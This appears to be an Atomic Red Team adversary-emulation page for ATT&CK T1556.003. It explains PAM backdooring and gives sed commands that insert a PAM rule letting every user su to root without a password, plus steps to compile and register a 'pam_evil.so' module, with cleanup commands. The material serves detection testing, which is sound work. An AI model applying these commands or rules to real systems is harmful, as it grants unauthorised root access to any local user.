Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module ispam_unix.so
, which retrieves, sets, and verifies account authentication information in/etc/passwd
and/etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM) Adversaries may modify components of the PAM system to create backdoors. PAM components, such aspam_unix.so
, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor) Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)
Inserts a rule into a PAM config and then tests it.
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
Supported Platforms: Linux
auto_generated_guid: 4b9dde80-ae22-44b1-a82a-644bf009eb9c
| Name | Description | Type | Default Value | |——|————-|——|—————| | path_to_pam_conf | PAM config file to modify. | string | /etc/pam.d/su-l| | pam_rule | Rule to add to the PAM config. | string | auth sufficient pam_succeed_if.so uid >= 0| | index | Index where the rule is inserted. | integer | 1|
1
sh
! Elevation Required (e.g. root or admin)1
sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
1
sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
Inserts a rule into a PAM config and then tests it.
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
Supported Platforms: Linux
auto_generated_guid: b17eacac-282d-4ca8-a240-46602cf863e3
| Name | Description | Type | Default Value | |——|————-|——|—————| | path_to_pam_conf | PAM config file to modify. | string | /etc/pam.d/su| | pam_rule | Rule to add to the PAM config. | string | auth sufficient pam_succeed_if.so uid >= 0| | index | Index where the rule is inserted. | integer | 8|
1
sh
! Elevation Required (e.g. root or admin)1
sudo sed -i "" "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
1
sudo sed -i "" "/#{pam_rule}/d" #{path_to_pam_conf}
Creates a PAM module, inserts a rule to use it, and then tests it.
Upon successful execution, this test will create a PAM module that allows every user to su to root without a password.
Supported Platforms: Linux
auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
| Name | Description | Type | Default Value | |——|————-|——|—————| | path_to_pam_conf | PAM config file to modify. | string | /etc/pam.d/su-l| | pam_rule | Rule to add to the PAM config. | string | auth sufficient /tmp/pam_evil.so| | index | Index where the rule is inserted. | integer | 1| | path_to_pam_module_source | Path to PAM module source code. | path | PathToAtomicsFolder/T1556.003/src/pam_evil.c| | path_to_pam_module | Path to PAM module object | path | /tmp/pam_evil.so|
1
sh
! Elevation Required (e.g. root or admin)1
sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
1
sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
1
sh
!1
if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi;
1
if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi
1
if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi;
1
sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}